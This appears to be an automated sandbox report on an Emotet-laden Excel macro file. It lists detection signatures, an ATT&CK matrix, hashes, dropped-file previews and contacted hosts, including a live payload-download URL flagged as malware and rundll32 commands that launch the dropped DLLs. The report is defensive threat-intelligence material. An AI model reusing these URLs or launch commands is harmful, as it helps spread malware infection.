Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B07D2 mov eax, dword ptr fs:[00000030h]	6_2_001B07D2

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E44A462
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E44AB0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E450326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E450326

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy			Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A584 cpuid

3_2_6E44A584

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6E44A755

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection12	Masquerading131	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting1	LSA Secrets	System Information Discovery15	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.rundll32.exe.1ec0000.7.unpack	100%	Avira	HEUR/AGEN.1110387		Download File
6.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.openformatrg/drawml/2006/spreadsheetD	0%	Avira URL Cloud	safe
http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI	0%	Avira URL Cloud	safe
http://schemas.openformatrg/package/2006/content-t	0%	URL Reputation	safe
http://sadabahar.com.np/wp-inclu	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://sadabahar.com.np/wp-i	0%	Avira URL Cloud	safe
http://schemas.open	0%	URL Reputation	safe
http://sadabahar.com.n	0%	Avira URL Cloud	safe
http://sadabahar.c	0%	Avira URL Cloud	safe
http://sadabahar.com	0%	Avira URL Cloud	safe
http://sadabahar.co	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad	0%	Avira URL Cloud	safe
http://schemas.openformatrg/package/2006/r	0%	URL Reputation	safe
http://www.duoyuhudong.cn/wp-content/we8xi/vvC:	100%	Avira URL Cloud	malware
http://www.duoyuhudong.cn/wp-content/we8xi/	100%	Avira URL Cloud	malware
http://sadabahar.com.np/wp-includes/pUMqITCt83a/	0%	Avira URL Cloud	safe
http://sadabahar.com.np/wp-includes/pUMqITCt83a/J	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://sadabahar.com.np/w	0%	Avira URL Cloud	safe
http://sadabahar.com.np/wp-inc	0%	Avira URL Cloud	safe
http://sadabahar.com.np/wp-includes/pUMqITCt83a/A	0%	Avira URL Cloud	safe
http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.duoyuhudong.cn	47.96.4.95	true	false		unknown
sadabahar.com.np	194.233.67.242	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.duoyuhudong.cn/wp-content/we8xi/	true	Avira URL Cloud: malware	unknown
http://sadabahar.com.np/wp-includes/pUMqITCt83a/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	false		high
http://investor.msn.com	EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	false		high
http://schemas.openformatrg/drawml/2006/spreadsheetD	EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.openformatrg/package/2006/content-t	EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://sadabahar.com.np/wp-inclu	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	false		high
http://sadabahar.com.np/wp-i	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.open	EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://sadabahar.com.n	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.c	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.com	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	false		high
http://sadabahar.co	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.openformatrg/package/2006/r	EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	false		high
http://www.duoyuhudong.cn/wp-content/we8xi/vvC:	EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com/	EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	false		high
http://sadabahar.com.np/wp-includes/pUMqITCt83a/J	EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://sadabahar.com.np/w	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.com.np/wp-inc	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.com.np/wp-includes/pUMqITCt83a/A	EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p	EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.96.4.95	www.duoyuhudong.cn	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
194.233.67.242	sadabahar.com.np	Germany		6659	NEXINTO-DE	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532596
Start date:	02.12.2021
Start time:	14:30:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DOC-0212.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@8/7@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.3% (good quality ratio 17%) Quality average: 69.9% Quality standard deviation: 26.5%
HCA Information:	Successful, ratio: 71% Number of executed functions: 34 Number of non-executed functions: 45
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:31:57	API Interceptor	425x Sleep call for process: svchost.exe modified
14:33:30	API Interceptor	18x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NEXINTO-DE	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	194.163.155.54
	Sz4lxTmH7r.exe	Get hash	malicious	Browse	194.195.211.98
	YjKK5XYBzB	Get hash	malicious	Browse	212.229.116.92
	setup_x86_x64_install.exe	Get hash	malicious	Browse	194.195.211.98
	nkXzJnW7AH.exe	Get hash	malicious	Browse	194.195.211.98
	sora.arm7	Get hash	malicious	Browse	195.179.208.175
	kq5Of3SOMZ.exe	Get hash	malicious	Browse	194.195.211.98
	zMvP34LhcZ.exe	Get hash	malicious	Browse	194.163.158.120
	KKveTTgaAAsecNNaaaa.arm7-20211122-0650	Get hash	malicious	Browse	212.228.109.42
	lessie.arm	Get hash	malicious	Browse	194.195.1.105
	CVfKJhwYQW.exe	Get hash	malicious	Browse	194.195.211.98
	CVfKJhwYQW.exe	Get hash	malicious	Browse	194.195.211.98
	fXlJhe5OGb.exe	Get hash	malicious	Browse	194.195.211.98
	pQdDcGbFWF	Get hash	malicious	Browse	212.228.240.244
	111821 New Order_xlxs.exe	Get hash	malicious	Browse	194.195.211.98
	e7sNr2qu79.exe	Get hash	malicious	Browse	194.195.211.98
	X9dXlHMc21	Get hash	malicious	Browse	212.228.240.243
	PO-No 243563746 Sorg.exe	Get hash	malicious	Browse	194.233.74.163
	JzMR5r3jpt	Get hash	malicious	Browse	195.179.60.11
	apep.x86	Get hash	malicious	Browse	195.179.60.64
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	sys.exe	Get hash	malicious	Browse	8.189.23.166
	qu1wfRmk6z	Get hash	malicious	Browse	121.197.249.173
	xPj5d9l2Qg	Get hash	malicious	Browse	47.107.174.88
	biKMh38rah	Get hash	malicious	Browse	42.121.223.186
	BX67S7KlgC	Get hash	malicious	Browse	47.117.15.214
	d2REPCiUoq	Get hash	malicious	Browse	8.175.9.99
	MTjXit7IJn	Get hash	malicious	Browse	39.100.172.144
	MA4UA3e5xe	Get hash	malicious	Browse	47.122.243.140
	9XtX9oou5Y	Get hash	malicious	Browse	120.77.138.115
	7EohYs6rg9	Get hash	malicious	Browse	8.132.148.58
	rIiLBFxqPW	Get hash	malicious	Browse	118.31.165.111
	buiodawbdawbuiopdw.arm7	Get hash	malicious	Browse	101.133.52.203
	buiodawbdawbuiopdw.x86	Get hash	malicious	Browse	47.101.55.154
	Db89KMtOpL	Get hash	malicious	Browse	114.215.209.10
	k7L2CA2IN0	Get hash	malicious	Browse	114.55.154.126
	txAfyNjwr9	Get hash	malicious	Browse	8.182.179.241
	WzwJmknZ2G	Get hash	malicious	Browse	8.188.217.86
	45ijGj4CVn	Get hash	malicious	Browse	8.129.243.129
	arm	Get hash	malicious	Browse	8.142.57.223
	arm7	Get hash	malicious	Browse	8.147.204.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	372736
Entropy (8bit):	7.067308598175135
Encrypted:	false
SSDEEP:	6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
MD5:	A328C761D2F253534919BFF4FB3C89B4
SHA1:	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
SHA-256:	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
SHA-512:	EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
Malicious:	true
Reputation:	low
IE Cache URL:	http://www.duoyuhudong.cn/wp-content/we8xi/
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	14200
Entropy (8bit):	7.855440184003825
Encrypted:	false
SSDEEP:	384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
MD5:	4FE798EE522800691796BC9446918C90
SHA1:	1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
SHA-256:	EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
SHA-512:	FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..\|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).

C:\Users\user\AppData\Local\Temp\CC82.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF09EB9009A60E04D7.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$DOC-0212.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\besta.ocx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	372736
Entropy (8bit):	7.067308598175135
Encrypted:	false
SSDEEP:	6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
MD5:	A328C761D2F253534919BFF4FB3C89B4
SHA1:	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
SHA-256:	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
SHA-512:	EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy) Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	372736
Entropy (8bit):	7.067308598175135
Encrypted:	false
SSDEEP:	6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
MD5:	A328C761D2F253534919BFF4FB3C89B4
SHA1:	3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
SHA-256:	FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
SHA-512:	EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.6274713659027045
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	DOC-0212.xlsm
File size:	38175
MD5:	aa4f296ed678b18394a365861777241c
SHA1:	cedfd0d995958b8550f36d037c732854e23c68c5
SHA256:	20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
